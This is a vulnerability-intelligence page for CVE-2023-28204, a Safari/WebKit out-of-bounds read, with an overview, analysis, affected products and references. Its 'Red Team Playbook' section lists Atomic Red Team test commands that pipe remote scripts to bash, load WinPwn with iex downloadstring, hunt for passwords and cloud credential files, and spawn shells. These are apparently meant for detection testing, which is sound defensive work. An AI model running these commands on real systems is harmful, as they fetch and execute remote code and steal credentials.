CVE-2023-28204
Overview
This vulnerability is an out-of-bounds read caused by improper input validation in the processing of web content within Apple software components. The flaw arises when certain data structures are accessed beyond their allocated bounds, specifically affecting the Safari browser and underlying system libraries on macOS, iOS, iPadOS, tvOS, and watchOS platforms. The root cause is insufficient boundary checks during memory reads, leading to exposure of unintended memory regions.
Vulnerability Description
An out-of-bounds read was addressed with improved input validation. This issue is fixed in watchOS 9.5, tvOS 16.5, macOS Ventura 13.4, iOS 15.7.6 and iPadOS 15.7.6, Safari 16.5, iOS 16.5 and iPadOS 16.5. Processing web content may disclose sensitive information. Apple is aware of a report that this issue may have been actively exploited.
Impact
An attacker can exploit this vulnerability by convincing a user to visit a malicious web page, causing the browser to read memory beyond intended boundaries and potentially disclose sensitive information from process memory. This can lead to unauthorized access to confidential data such as passwords, tokens, or other sensitive information held in memory. No authentication is required, but user interaction to visit the malicious content is necessary. The exposure of sensitive information can facilitate further attacks or data breaches, impacting user privacy and organizational security.
Solution
Apple has addressed this issue in security updates released with macOS Ventura 13.4, iOS 15.7.6 and 16.5, iPadOS 15.7.6 and 16.5, tvOS 16.5, and watchOS 9.5. Users and administrators should apply these updates promptly. Detailed patch instructions and advisory information are available at Apple's official security support pages: https://support.apple.com/en-us/HT213758, https://support.apple.com/en-us/HT213762, and https://support.apple.com/en-us/HT213764.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in question involves an out-of-bounds read, a critical issue that arises when a program reads data outside the boundaries of allocated memory. This flaw can lead to the disclosure of sensitive information, as it allows an attacker to access memory locations that should not be accessible. In this case, the affected products include various versions of Apple's operating systems, including iOS, iPadOS, macOS, watchOS, and tvOS, as well as the Safari web browser. The root cause of the vulnerability was traced back to inadequate input validation, which has since been addressed in the latest updates. By improving input validation mechanisms, Apple has mitigated the risk associated with this vulnerability, but the potential for exploitation remains a concern.
Attack vectors for this vulnerability primarily involve the processing of web content, making it particularly relevant for users who frequently browse the internet using Safari or other affected platforms. An attacker could craft a malicious web page designed to exploit this flaw. When a victim visits the compromised site, the attacker could leverage the out-of-bounds read to retrieve sensitive information from the victim's device, such as authentication tokens, session cookies, or personal data stored in memory. Given the widespread use of Apple's devices and the popularity of Safari as a web browser, the potential for exploitation is significant, especially if the vulnerability has been actively targeted by malicious actors.
The real-world impact of this vulnerability can be profound, particularly for businesses that rely on Apple devices for operations. If exploited, the vulnerability could lead to unauthorized access to sensitive corporate data, resulting in data breaches that could compromise customer information, intellectual property, and proprietary business processes. The financial implications of such breaches can be severe, including regulatory fines, legal liabilities, and damage to brand reputation. Furthermore, the potential for exploitation in a corporate environment could lead to operational disruptions, loss of customer trust, and increased scrutiny from stakeholders.
To effectively detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First and foremost, it is crucial to ensure that all affected devices are updated to the latest versions of the operating systems and applications, as these updates contain the necessary patches to address the vulnerability. Additionally, organizations should employ robust security measures such as web filtering, intrusion detection systems, and endpoint protection solutions to monitor for suspicious activity. Regular security assessments and penetration testing can also help identify potential weaknesses in the organization's defenses. Finally, fostering a culture of security awareness among employees can significantly reduce the risk of falling victim to exploitation attempts, as users are often the first line of defense against cyber threats.
In conclusion, the out-of-bounds read vulnerability presents a notable risk to users of Apple's ecosystem, particularly in terms of data privacy and security. While the issue has been addressed through improved input validation, the potential for exploitation underscores the importance of proactive security measures. By remaining vigilant and implementing comprehensive detection and mitigation strategies, organizations can protect themselves against the threats posed by such vulnerabilities and safeguard their sensitive information in an increasingly hostile digital landscape.
Affected Products (9)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Apple | Safari | All |
cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Ipados | All |
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Iphone Os | All |
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
|
|
|
Apple | Macos | All |
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
|
|
|
Apple | Tvos | All |
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*
|
|
|
Apple | Watchos | All |
cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*
|
|
|
Webkitgtk | Webkitgtk\+ | All |
cpe:2.3:a:webkitgtk:webkitgtk\+:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-540 | Overread Buffers |
33%
|
Low | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (9)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-28204 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213758 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213762 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213764 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213765 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213757 |
| support.apple.com |
GitHub CVE
|
https://support.apple.com/en-us/HT213761 |
| security.gentoo.org |
GitHub CVE
|
https://security.gentoo.org/glsa/202401-04 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-28204 |